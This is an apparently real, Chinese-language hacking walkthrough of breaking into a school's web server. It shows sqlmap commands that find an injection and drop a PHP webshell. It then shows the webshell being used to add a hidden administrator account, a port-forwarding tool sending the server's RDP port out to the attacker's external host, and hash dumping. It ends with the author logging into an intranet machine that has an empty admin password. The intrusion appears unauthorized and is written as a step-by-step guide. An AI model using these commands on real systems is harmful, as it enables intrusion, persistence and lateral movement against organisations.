目标站www.xxxx.cn ,直接放sqlmap跑

实战提权某学校网站服务器

信息就出来啦…….

然后执行

Sqlmap.py -u “http://www.xxxx.cn/riyunbaimu/dlm.php?c=1” –current-user   

(查看当前数据库连接用户的意思)
实战提权某学校网站服务器

如上图所示.  数据库是root帐号登录的

我们还要看下 root帐号被降权没有

Sqlmap.py -u “http://www.xxxx.cn/riyunbaimu/dlm.php?c=1” –is-dba

(查看是否是管理员权限)

实战提权某学校网站服务器

这里是管理员权限

那么 我们直接用sqlmap写一个交互式shell

执行

Sqlmap.py -u “http://www.xxxx.cn/riyunbaimu/dlm.php?c=1” –os-shell

实战提权某学校网站服务器

这里选择4 php

然后稍等…几分钟 或者几十秒…

实战提权某学校网站服务器

这里第一眼可以看到 1 这里 写shell成功了

另外 我们的视线转移到2 和3‚这里来

这两个文件地址  是 sqlmap上传的shell

我们来打开

实战提权某学校网站服务器

可以看到 一个小马 躺在这里  接下来该怎么做 不用我说了吧

(直接上传你的大马 或者小马)

先getshell

那么我们现在来看看‚这里

实战提权某学校网站服务器

一片空白… 难道是一句话?

我们来看看这个文件的代码…
实战提权某学校网站服务器

可以看到 cmd这个变量..

Cmd这是个变量 就是接收参数的….. ,也就是说 我们可以控制 cmd这个变量来执行cmd命令
实战提权某学校网站服务器

实战提权某学校网站服务器

这个system权限够大了吧..哈哈..

接下来呢  net user xxxxx xxx /ad&net localgroup administrators xxxx /ad

提权进服务器 嘿嘿..

实战提权某学校网站服务器

但是呢
实战提权某学校网站服务器

是内网  我们用个端口转发就好了…

首先你得有一台外网的服务器对吧…

首先在外网的服务器监听  (我这里是 mylcx  可能和  lcx 执行的命令有所不同  但是 功能大同小异…)

憋说话…看下图..

实战提权某学校网站服务器

用mylcx 执行以下命令

Mylcx -listen 1234 4567

监听1234 端口 转发到 4567端口 (这里是在自己外网服务器执行哦 别搞错啦..)

然后 到刚刚那个网站那里

上传一个mylcx到c:\wmpub这个目录下面

实战提权某学校网站服务器

这样就 ok啦…?   Nononono

先来看看 这台服务器开3389没有 或者  3389端口被修改没有

有经验的人 执行 netstat -ano

实战提权某学校网站服务器

根据经验判断 远程桌面 端口 一般是最后一个 TCP  0.0.0.0:  后面对应的端口号 这里是默认的 3389啦..

既然开放了 3389 那么我们直接映射3389 到我外网的那台服务器的 1234端口就好啦..

执行以下命令

c:\wmpub\mylcx -slave 3389 xx.xx.165.254 1234

然后按回车  同时 可以看到 我外网的服务器1234端口接收到了数据 并把1234 的数据传送到了 4567

实战提权某学校网站服务器

Cmd里面翻译过来大概意思就是 如下图..

实战提权某学校网站服务器

然后我们连接我外网服务器的 4567 端口  就等于连接到了 那个网站的 3389端口

实战提权某学校网站服务器

网站是 apache搭建的…

实战提权某学校网站服务器

既然是内网 那么我们可以尝试 getpass 或者 get hash  来尝试一下撸内网..

实战提权某学校网站服务器

实战提权某学校网站服务器

可以看到 同网段的服务器就这几台…  

发现有 10.106.62.58 这台服务器 administrator 空口令…

登录
实战提权某学校网站服务器